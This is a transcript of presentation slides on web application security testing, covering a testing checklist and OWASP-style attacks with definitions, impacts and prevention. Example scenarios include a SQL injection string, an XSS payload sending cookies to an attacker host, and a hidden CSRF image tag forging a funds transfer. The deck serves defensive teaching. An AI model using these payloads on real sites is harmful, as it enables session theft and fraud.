web application security testing
TRANSCRIPT
![Page 1: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/1.jpg)
WEB APPLICATION SECURITY TESTING
![Page 2: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/2.jpg)
WHAT IS A WEB APPLICATION?
•A web application or web service is a software application that is accessible using a web browser or HTTP(s) user agent.
![Page 3: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/3.jpg)
![Page 4: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/4.jpg)
Examples of security flaws in an application:
1) A Student Management System is insecure if ‘Admission’ branch can edit the data of ‘Exam’ branch2) An ERP system is not secure if DEO (data entry operator) can generate ‘Reports’3) An online Shopping Mall has no security if customer’s Credit Card Detail is not encrypted4) A custom software possess inadequate security if an SQL query retrieves actual passwords of its users
![Page 5: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/5.jpg)
WHAT IS WEB APPLICATION SECURITY?
Securing the “custom code” that drives a web applicationSecuring librariesSecuring backend systemsSecuring web and application servers
![Page 6: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/6.jpg)
SECURITY TESTING• Dynamic Analysis• Web Application Scanner
• Static Analysis• Tool Based Code Review
• Manual Code Review• Peer Review
Security Testing
Static Analysis
Dynamic Analysis
Code Review
![Page 7: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/7.jpg)
WEB APPLICATION SECURITY TESTING PHASE
• Information Gathering• Manually explore the site• Spider/crawl for missed or hidden content• Check for files that expose content, such as robots.txt,
sitemap.xml, .DS_Store
![Page 8: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/8.jpg)
CONFIGURATION MANAGEMENT
• Check for commonly used application and administrative URLs• Check for old, backup and unreferenced files• Check for sensitive data in client-side code (e.g. API keys, credentials)
![Page 9: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/9.jpg)
SECURE TRANSMISSION
• Check SSL Version, Algorithms, Key length• Check for Digital Certificate Validity (Duration, Signature and CN)• Check credentials only delivered over HTTPS
![Page 10: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/10.jpg)
AUTHENTICATION
• Test for user enumeration• Test for authentication bypass• Test for bruteforce protection• Test password quality rules• Test remember me functionality• Test for autocomplete on password forms/input
![Page 11: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/11.jpg)
SESSION MANAGEMENT
• Establish how session management is handled in the application (eg, tokens in cookies, token in URL)
• Check session tokens for cookie flags (httpOnly and secure)• Check session cookie scope (path and domain)• Check session cookie duration (expires and max-age)
![Page 12: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/12.jpg)
AUTHORIZATION
• Test for path traversal• Test for bypassing authorization schema• Test for missing authorization
![Page 13: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/13.jpg)
DATA VALIDATION
• Test for Reflected Cross Site Scripting• Test for Stored Cross Site Scripting• Test for DOM based Cross Site Scripting• Test for Cross Site Flashing• Test for HTML Injection• Test for SQL Injection
![Page 14: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/14.jpg)
DENIAL OF SERVICE
• Test for anti-automation• Test for account lockout• Test for HTTP protocol DoS
![Page 15: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/15.jpg)
MOST CRITICAL WEB APPLICATION SECURITY ATTACKS
• Cross-Site Scripting (XSS)• Injection Flaws• Malicious File Execution• Insecure Direct Object Reference• Cross Site Request Forgery (CSRF)• Information Leakage and Improper Error Handling• Broken Authentication and Session Management• Insecure Cryptographic Storage• Insecure Communications• Failure to Restrict URL Access
![Page 16: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/16.jpg)
WEB APPLICATION SECURITY TOOLS
• Acunetix WVS by Acunetix• AppScan by IBM• Burp Suite Professional by PortSwigger• Hailstorm by Cenzic• N-Stalker by N-Stalker• Nessus by Tenable Network Security• NetSparker by Mavituna Security• NeXpose by Rapid7
![Page 17: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/17.jpg)
DEMOACUNETIX WVS BY ACUNETIX
![Page 18: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/18.jpg)
A1. INJECTION FLAWS
Definition• Injection flaws occur when un-trusted data is sent to an interpreter as
part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.
• Various flavors of injection flaws: SQL, OS, LDAP to name a few.
![Page 19: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/19.jpg)
A1. INJECTION FLAWS
Example Attack Scenario
String query = "SELECT * FROM accounts WHERE custID='" +
request.getParameter("id") +"'";
The attacker modifies the ‘id’ parameter in their browser to send: ' or '1'='1. This changes the meaning of the query to return all the records from the accounts database, instead of only the intended customer’s.
![Page 20: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/20.jpg)
A1. INJECTION FLAWS
Impact (Severe)
• Data loss or corruption• Lack of accountability• Denial of access• In certain cases could lead to complete takeover of
host
![Page 21: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/21.jpg)
A1. INJECTION FLAWS
Prevention
• Do not trust data from clients, validate all input.• Use parameterized APIs whenever possible, e.g. SQL
prepared statements• If parameterized API not available, use escaping
routines before sending data to the interpreter/shell.
![Page 22: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/22.jpg)
A2. CROSS-SITE SCRIPTING (XSS)
Definition• XSS flaws occur whenever an application takes un-trusted
data and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
• Three types – stored, reflected, and DOM based XSS.• The most prevalent web application security flaw.
![Page 23: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/23.jpg)
A2. CROSS-SITE SCRIPTING (XSS)
Example Attack Scenario
(String) page +=
"<input name='creditcard' type= 'TEXT' value='" + request.getParameter("CC") + "'>";
The attacker modifies the 'CC' parameter in their browser to: '><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'.
This causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.
![Page 24: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/24.jpg)
A2. CROSS-SITE SCRIPTING (XSS)
Impact (Moderate)• Attacker can execute scripts in a victim’s browser, which
can open the door to:– Hijacking the user’s session– Defacing the web site– Insertion of hostile content– Redirecting the user to another site– Attempting to install malware on the user’s machine
![Page 25: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/25.jpg)
A2. CROSS-SITE SCRIPTING (XSS)
Prevention• Escape/encode all data that is written to a web page.
– <script>alert('got you');</script> (raw html)– <script>alert('got you')</script> (encoded html)
• Do not trust data from clients, validate all input.
![Page 26: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/26.jpg)
A3. BROKEN AUTHENTICATION AND SESSION MANAGEMENT
Definition• Application functions related to authentication and
session management are often not implemented correctly, allowing attackers to compromise passwords, keys, session tokens, or exploit other implementation flaws to assume other users’ identities.
![Page 27: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/27.jpg)
A3. BROKEN AUTHENTICATION AND SESSION MANAGEMENT
Example Attack Scenarios• Application’s timeouts aren’t set properly. User uses a public
computer to access site. Instead of selecting “logout” the user simply closes the browser tab and walks away. Attacker uses the same browser an hour later, and that browser is still authenticated.
• Attacker gains access to the system’s password database. User passwords are not encrypted, exposing every users’ password to the attacker.
![Page 28: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/28.jpg)
A3. BROKEN AUTHENTICATION AND SESSION MANAGEMENT
Impact (Severe)• Such flaws may allow some or even all accounts to
be attacked.• Once successful, the attacker can do anything the
victim could do.• Privileged accounts are frequently targeted.
![Page 29: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/29.jpg)
A3. BROKEN AUTHENTICATION AND SESSION MANAGEMENT
Prevention• A single set of strong authentication and session management controls. Such
controls should strive to:– Meet the requirements defined in OWASP’s Application Security Verification Standard(ASVS).– Have a simple interface for developers. Consider the ESAPI Authenticator and User APIs as
good examples to emulate, use, or build upon.
• Strong efforts should also be made to avoid XSS flaws which can be used to steal session IDs. See A2.
![Page 30: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/30.jpg)
A4. INSECURE DIRECT OBJECT REFERENCES
Definition• A direct object reference occurs when a developer
exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.
![Page 31: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/31.jpg)
A4. INSECURE DIRECT OBJECT REFERENCES
Example Attack Scenario
String query = "SELECT * FROM accts WHERE account = ?";PreparedStatement pstmt=connection.prepareStatement(query , … );pstmt.setString( 1, request.getparameter("acct"));ResultSet results = pstmt.executeQuery( );
The attacker simply modifies the 'acct' parameter in their browser to send whatever account number they want. If not verified, the attacker can access any user’s account, instead of only the intended customer’s account.
http://example.com/app/accountInfo?acct=notmyacct
![Page 32: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/32.jpg)
A4. INSECURE DIRECT OBJECT REFERENCES
Impact (Moderate)• Such flaws can compromise all the data that can be
referenced by the parameter.• Unless the namespace is sparse, it’s easy for an
attacker to access all available data of that type.
![Page 33: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/33.jpg)
A4. INSECURE DIRECT OBJECT REFERENCES
Prevention• Use per-user or session indirect object references. This prevents
attackers from directly targeting unauthorized resources by knowing actual keys.
• Check access. Each use of a direct object reference from an untrusted source must include an access control check to ensure the user is authorized for the requested object.
![Page 34: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/34.jpg)
A5. CROSS-SITE REQUEST FORGERY (CSRF)
Definition• A CSRF attack forces a logged-on victim’s browser to send a
forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application.
• This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim.
![Page 35: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/35.jpg)
A5. CROSS-SITE REQUEST FORGERY (CSRF)
Example Attack ScenarioThe application allows a user to submit a state changing request that does not include anything secret.http://example.com/app/transferFunds?amount=150&destinationAccount=467
The attacker constructs a request that will transfer money from the victim’s account to their account, and then embeds this attack in an image request or iframe stored on various sites under the attacker’s control.
<imgsrc="http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#“width="0" height="0" />If the victim visits any of these sites while already authenticated to example.com, any forged requests will include the user’s session info, inadvertently authorizing the request.
![Page 36: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/36.jpg)
A5. CROSS-SITE REQUEST FORGERY (CSRF)
Impact (Moderate)• Attackers can cause victims to change any
data the victim is allowed to change or perform many function the victim is authorized to use.
![Page 37: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/37.jpg)
A5. CROSS-SITE REQUEST FORGERY (CSRF)
Prevention• Preventing CSRF requires the inclusion of a unpredictable token in the body
or URL of each HTTP request. Such tokens should at a minimum be unique per user session, but can also be unique per request.– The preferred option is to include the unique token in a hidden field. This causes the
value to be sent in the body of the HTTP request, avoiding its inclusion in the URL, which is subject to exposure.
• OWASP’s CSRF Guardcan be used to automatically include such tokens in your Java EE, .NET, or PHP application. OWASP’s ESAPI includes token generators and validators that developers can use to protect their transactions.
![Page 38: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/38.jpg)
A6. SECURITY MISCONFIGURATION
Definition• Good security requires having a secure configuration defined
and deployed for the application, frameworks, application server, web server, database server, and platform.
• All these settings should be defined, implemented, and maintained as many are not shipped with secure defaults. This includes keeping all software up to date, including all code libraries used by the application.
![Page 39: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/39.jpg)
A6. SECURITY MISCONFIGURATION
Example Attack Scenarios• Scenario #1: Your application relies on a powerful framework like Struts or
Spring. XSS flaws are found in these framework components you rely on. An update is released to fix these flaws but you don’t update your libraries. Until you do, attackers can easily find and exploit these flaw in your app.
• Scenario #2: The app server admin console is automatically installed and not removed. Default accounts aren’t changed. Attacker discovers the standard admin pages are on your server, logs in with default passwords, and takes over.
![Page 40: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/40.jpg)
A6. SECURITY MISCONFIGURATION
Example Attack Scenarios (cont.)• Scenario #3: Directory listing is not disabled on your server. Attacker
discovers she can simply list directories to find any file. Attacker finds and downloads all your compiled Java classes, which she reverses to get all your custom code. She then find a serious access control flaw in your application.
• Scenario #4: App server configuration allows stack traces to be returned to users, potentially exposing underlying flaws. Attackers love the extra information error messages provide.
![Page 41: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/41.jpg)
A6. SECURITY MISCONFIGURATION
Impact (Moderate)• Such flaws frequently give attackers
unauthorized access to some system data or functionality. • Occasionally, such flaws result in a complete
system compromise.
![Page 42: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/42.jpg)
A6. SECURITY MISCONFIGURATION
Prevention• A repeatable hardening process that makes it fast and easy to deploy
another environment that is properly locked down. Development, QA, and production environments should all be configured identically. This process should be automated to minimize the effort required to setup a new secure environment.
• A process for keeping abreast of and deploying all new software updates and patches in a timely manner to each deployed environment. This needs to include all code libraries as well, which are frequently overlooked.
![Page 43: Web Application Security testing](https://reader036.vdocuments.net/reader036/viewer/2022062522/58a6b3ca1a28ab661f8b49b3/html5/thumbnails/43.jpg)
A6. SECURITY MISCONFIGURATION
Prevention (cont.)• A strong application architecture that provides good
separation and security between components.• Consider running scans and doing audits periodically
to help detect future misconfigurations or missing patches.